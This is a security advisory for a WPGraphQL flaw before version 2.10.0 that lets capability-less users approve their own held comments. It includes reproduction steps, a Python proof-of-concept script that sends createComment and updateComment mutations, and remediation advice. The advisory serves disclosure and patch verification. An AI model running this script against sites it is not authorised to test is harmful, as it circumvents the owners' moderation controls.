WPGraphQL Comment Moderation Bypass Vulnerability

Vulnerability

A vulnerability in WPGraphQL prior to version 2.10.0 allows low-privileged authenticated users, including users assigned a custom role with no capabilities at all, to change the moderation status of their own comments. The authorization check in the 'updateComment' mutation decides whether a caller may modify a comment based on comment ownership rather than on a moderation capability, so any user who authored a comment can also set its status. A user whose comment was held for moderation can therefore approve it themselves, circumventing the site's established moderation process without holding any permission that WordPress normally requires for that action.

Impact

Exploiting this vulnerability bypasses the comment moderation workflow: low-privileged users can publish their own comments without review, so content that moderators would otherwise hold, edit or reject appears on the site immediately. This undermines the site's content management controls and any anti-spam or anti-abuse process that depends on moderation.

Reproduction

The vulnerability can be reproduced by creating a custom WordPress role with no capabilities, creating a user and assigning them that role, and enabling comment moderation so that new comments are held rather than published. After logging in as this user, a comment is added to a post (for example through the 'createComment' mutation); with moderation enabled the new comment is created in the held state. The 'updateComment' mutation is then called for that comment with the status set to 'APPROVE'. On an affected version the mutation succeeds and the comment becomes approved, even though the user lacks the moderation permissions required for this change; on a patched version the mutation is refused. This process can be automated with a script that sends the two mutations to the WordPress GraphQL endpoint as the low-privileged user and checks the returned comment status.
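The following script is an added example of the automated check described above; it is not code from the advisory or from the WPGraphQL project. It assumes the WPGraphQL schema exposes 'createComment' and 'updateComment' mutations whose input accepts a 'status' field of enum type CommentStatusEnum with the values HOLD and APPROVE, that 'commentOn' takes the post's database ID, and that the HTTP request carries whatever headers authenticate the low-privileged user (a WordPress login cookie together with an X-WP-Nonce header, or another mechanism the site accepts). The endpoint, post ID and headers are read from environment variables. The sample responses at the bottom are constructed for the offline test and are not real server output.

```python
"""Check whether a WPGraphQL site lets a low-privileged user self-approve a comment.

Added example (not from the advisory or the WPGraphQL project). Assumptions:
- createComment/updateComment exist with a `status: CommentStatusEnum` input;
- `commentOn` is the post's database ID;
- the headers passed in authenticate the low-privileged test user.
"""
import json
import os
import urllib.request

# Assumed mutation shapes; field names follow the WPGraphQL schema as commonly documented.
CREATE_COMMENT = """
mutation CreateComment($postId: Int!, $content: String!) {
  createComment(input: {commentOn: $postId, content: $content}) {
    comment { id databaseId status }
  }
}
"""

UPDATE_COMMENT = """
mutation UpdateComment($id: ID!, $status: CommentStatusEnum!) {
  updateComment(input: {id: $id, status: $status}) {
    comment { id databaseId status }
  }
}
"""


def build_payload(query: str, variables: dict) -> dict:
    """Wrap a query and its variables in the JSON body GraphQL servers expect."""
    return {"query": query, "variables": variables}


def post_graphql(endpoint: str, payload: dict, headers: dict) -> dict:
    """POST a GraphQL payload and return the decoded JSON response (needs network)."""
    body = json.dumps(payload).encode()
    req = urllib.request.Request(
        endpoint,
        data=body,
        headers={"Content-Type": "application/json", **headers},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)


def created_comment(resp: dict) -> dict:
    """Return the comment object from a createComment response, or {} on failure."""
    return ((resp.get("data") or {}).get("createComment") or {}).get("comment") or {}


def comment_is_held(resp: dict) -> bool:
    """Precondition for the test: the new comment must start out held for moderation."""
    return created_comment(resp).get("status") == "HOLD"


def classify_update_response(resp: dict) -> str:
    """Interpret an updateComment response.

    'vulnerable'   - the server returned the comment with status APPROVE
    'refused'      - the server returned errors (expected once patched; inspect the
                     message to confirm it is an authorization error, not a schema mismatch)
    'inconclusive' - no errors but the status did not change to APPROVE
    """
    comment = ((resp.get("data") or {}).get("updateComment") or {}).get("comment") or {}
    if comment.get("status") == "APPROVE":
        return "vulnerable"
    if resp.get("errors"):
        return "refused"
    return "inconclusive"


def reproduce(endpoint: str, headers: dict, post_id: int) -> str:
    """Create a held comment as the low-privileged user, then try to approve it."""
    create_resp = post_graphql(
        endpoint, build_payload(CREATE_COMMENT, {"postId": post_id, "content": "moderation test"}), headers
    )
    if not comment_is_held(create_resp):
        raise RuntimeError("comment was not held; enable comment moderation before testing")
    comment_id = created_comment(create_resp)["id"]
    update_resp = post_graphql(
        endpoint, build_payload(UPDATE_COMMENT, {"id": comment_id, "status": "APPROVE"}), headers
    )
    return classify_update_response(update_resp)


# Constructed sample responses used to exercise the classifier offline; the error
# text is made up and is not the message WPGraphQL actually returns.
SAMPLE_VULNERABLE = {
    "data": {"updateComment": {"comment": {"id": "Y29tbWVudDo0Mg==", "databaseId": 42, "status": "APPROVE"}}}
}
SAMPLE_REFUSED = {
    "errors": [{"message": "constructed: not allowed to change this comment's status"}],
    "data": {"updateComment": None},
}

if __name__ == "__main__":
    endpoint = os.environ["WPGRAPHQL_ENDPOINT"]  # e.g. https://example.invalid/graphql (assumed)
    post_id = int(os.environ["WPGRAPHQL_POST_ID"])
    headers = json.loads(os.environ.get("WPGRAPHQL_AUTH_HEADERS", "{}"))
    print(reproduce(endpoint, headers, post_id))
```

Run it against a test site you own, as the capability-less user, with comment moderation turned on; a result of 'vulnerable' means the ownership-based check is still in place, while 'refused' after updating to 2.10.0 or later confirms the fix, provided the error message is an authorization denial rather than a schema error from a mismatched field name.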

Remediation

Users are advised to update WPGraphQL to version 2.10.0 or later, where this vulnerability has been patched. The installed version can be confirmed from the Plugins screen in the WordPress admin or with WP-CLI ('wp plugin get wp-graphql --field=version'). After updating, repeating the reproduction steps as the low-privileged user should cause the 'updateComment' status change to be refused.

Added: Mar 24, 2026, 1:26 AM
Updated: Mar 24, 2026, 1:26 AM

Vulnerability Rating

Custom Algorithm
spread: 5.2
impact: 0.6
exploitability: 6.4
remediation: 7.7
relevance: 4.6
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.